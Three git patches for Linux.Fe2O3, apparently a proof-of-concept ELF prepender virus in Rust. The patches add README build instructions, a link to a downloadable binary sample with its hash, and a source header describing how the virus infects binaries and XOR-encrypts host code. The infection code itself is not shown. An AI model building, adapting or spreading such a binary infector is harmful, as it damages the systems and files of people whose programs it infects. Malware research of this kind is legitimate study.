From ff6a3d9bc946a73984d1a35d2fff278de74070bf Mon Sep 17 00:00:00 2001
From: Guilherme Thomazi Bonicontro
Date: Fri, 6 Sep 2019 15:45:21 +0200
Subject: [PATCH 1/3] Update README.md
---
 README.md | 23 +++++++++++++++++++++--
 1 file changed, 21 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 7c223f9..d0289b2 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,21 @@
-# Fe2O3
-Simple prepender virus written in Rust
+# Linux.Fe2O3
+
+This is a POC ELF prepender written in Rust. I like writting prependers on languages that I'm learning and find interesting.
+
+# Build
+```$ cd src
+$ rustc main.rs -o Linux.Fe2O3
+```
+
+Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment.
+
+# Binary Sample
+A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 (SHA1: c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7).
+
+```
+$ file Linux.Fe2O3
+Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped
+```
+
+# Demo
+[![asciicast](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc.png)](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc)
From 0d6778bc9c3242bbe8553fa508caeb1dda2da763 Mon Sep 17 00:00:00 2001
From: Guilherme Thomazi Bonicontro
Date: Fri, 6 Sep 2019 15:52:14 +0200
Subject: [PATCH 2/3] Update main.rs
---
 src/main.rs | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
diff --git a/src/main.rs b/src/main.rs
index 8e96f38..922eb64 100644
--- a/src/main.rs
+++ b/src/main.rs
@@ -1,3 +1,26 @@
+/*
+ This is a ELF prepender written in Rust by TMZ (2019).
+ I like writting prependers on languages that I'm learning and find interesting.
+
+ Linux.Fe2O3 (September 2019) - Simple binary infector written in Rust.
+ This version encrypts the host code with a simple XOR and decrypts it at runtime.
+ It's almost a direct port from my Nim infector Linux.Cephei and Go infector Linux.Liora.
+
+ Build with: rustc main.rs -o Linux.Fe2O3
+
+ Note that Rust version used was rustc 1.37.0 (eae3437df 2019-08-13).
+ It has no external dependencies so it should compile under most systems (tested under x86_64).
+ It's also possible to adapt it to be a PE/Mach infector and compile under Windows/macOS.
+
+ Use at your own risk, I'm not responsible for any damages that this may cause.
+ A big shout for those who keeps the scene alive!
+
+ Feel free to email me: thomazi@linux.com || guilherme@guitmz.com
+ You can also find me at Twitter @TMZvx || @guitmz
+
+ https://www.guitmz.com
+*/
+
 use std::ffi::{OsStr, OsString};
 use std::fs::File;
 use std::io::prelude::*;
From a734f02f40cddaab2fba0d93710f404b85dd33b4 Mon Sep 17 00:00:00 2001
From: Guilherme Thomazi Bonicontro
Date: Fri, 6 Sep 2019 15:55:37 +0200
Subject: [PATCH 3/3] Update README.md
---
 README.md | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index d0289b2..8b72e54 100644
--- a/README.md
+++ b/README.md
@@ -10,11 +10,14 @@ $ rustc main.rs -o Linux.Fe2O3
 Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment.
 
 # Binary Sample
-A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3 (SHA1: c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7).
+A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3
 
 ```
 $ file Linux.Fe2O3
 Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped
+
+$ sha1sum Linux.Fe2O3
+c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7 Linux.Fe2O3
 ```
 
 # Demo